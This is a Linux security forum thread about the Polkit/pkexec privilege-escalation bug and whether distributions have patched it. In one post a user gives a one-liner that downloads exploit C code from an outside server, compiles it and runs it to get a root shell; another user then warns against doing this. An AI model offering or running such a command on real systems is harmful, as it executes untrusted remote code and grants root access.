LinuxQuestions.org
Help answer threads with 0 replies.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 01-30-2022, 10:53 AM   #16
boughtonp
Senior Member
 
Registered: Feb 2007
Location: UK
Distribution: Debian
Posts: 3,616

Rep: Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555

Quote:
Originally Posted by ////// View Post
uh oh, i were vulnerable.
The permissions themselves do not indicate vulnerability; changing the permissions is a workaround for those that cannot update to v0.120 of Polkit.

Security updates were released by major distros on 25th January (last Tuesday) - as an Arch user you just need to update as normal to receive the patched version of Polkit, and not worry about permissions.

The workaround is more for people who either cannot update (for whatever reason), or who might be using distros with unique repos but without security teams/advisories (which therefor might take longer to receive the patch).

 
1 members found this post helpful.
Old 01-30-2022, 11:01 AM   #17
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Arch Linux && OpenBSD 7.4 && Pop!_OS && Kali && Qubes-Os
Posts: 824

Original Poster
Rep: Reputation: 350Reputation: 350Reputation: 350Reputation: 350
thanks man
 
Old 01-30-2022, 11:11 AM   #18
wpeckham
LQ Guru
 
Registered: Apr 2010
Location: Continental USA
Distribution: Debian, Ubuntu, RedHat, DSL, Puppy, CentOS, Knoppix, Mint-DE, Sparky, VSIDO, tinycore, Q4OS, Manjaro
Posts: 5,714

Rep: Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721Reputation: 2721
I run updates daily (just once daily) and by the time I read about the issue with polkit I was already running the fixed version. (I run Manjaro.)
ARCH updated before Manjaro, so pure ARCH based distributions should have been safe first IF UPDATED.

From what I can tell all pure DEBIAN based distributions (say Sparky and VSIDO) should also have been patched before the word even got out widely about the vulnerability.
 
Old 01-31-2022, 09:12 AM   #19
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 19,872
Blog Entries: 12

Rep: Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053
Quote:
Originally Posted by ////// View Post
uh oh, i were vulnerable.
If your arch system is up-to-date then pkexec is at v 0.120 and you can undo the workaround.

edit: what wpeckham said.
 
Old 01-31-2022, 12:48 PM   #20
enigma9o7
Senior Member
 
Registered: Jul 2018
Location: Silicon Valley
Distribution: Bodhi Linux
Posts: 1,389

Rep: Reputation: 560Reputation: 560Reputation: 560Reputation: 560Reputation: 560Reputation: 560
Code:
curl https://haxx.in/files/blasty-vs-pkexec.c|gcc -o /tmp/a -xc - && echo whoami|/tmp/a
Is a one liner to test if you're still vulnerable. It downloads c code that exploits the policykit bug, compiles it and runs it.

When vulnerable, running it gives you root shell prompt; asking it whoami you get root as response as shown in screenshot.
When not vulnerable, running it does not give you shell prompt at all.
Attached Thumbnails
Click image for larger version

Name:	2022-01-31-104317.png
Views:	7
Size:	142.9 KB
ID:	38241  
 
Old 01-31-2022, 01:01 PM   #21
boughtonp
Senior Member
 
Registered: Feb 2007
Location: UK
Distribution: Debian
Posts: 3,616

Rep: Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555Reputation: 2555
Quote:
Originally Posted by enigma9o7 View Post
Is a one liner to test if you're still vulnerable.
Blindly downloading, compiling and executing code from a random server is not a good idea.

 
Old 01-31-2022, 01:11 PM   #22
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Arch Linux && OpenBSD 7.4 && Pop!_OS && Kali && Qubes-Os
Posts: 824

Original Poster
Rep: Reputation: 350Reputation: 350Reputation: 350Reputation: 350
Quote:
Originally Posted by boughtonp View Post
Blindly downloading, compiling and executing code from a random server is not a good idea.

i thought that too :O
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
LXer: 10-Year-Old PHP-FPM Local Privilege Escalation Vulnerability Discovered LXer Syndicated Linux News 0 10-29-2021 05:24 PM
LXer: Docker 1.12.6 Fixes Privilege Escalation Vulnerability LXer Syndicated Linux News 0 01-14-2017 12:03 PM
Rowhammer vulnerability Leads to Kernel Privilege Escalation Habitual General 2 03-13-2015 01:33 AM
Security vulnerability in sudo allows privilege escalation fskmh Slackware 1 03-05-2013 01:03 PM
Privilege Escalation - Getting 'root' privilege Rahil Parikh Linux - Security 2 12-02-2010 01:04 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 08:00 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration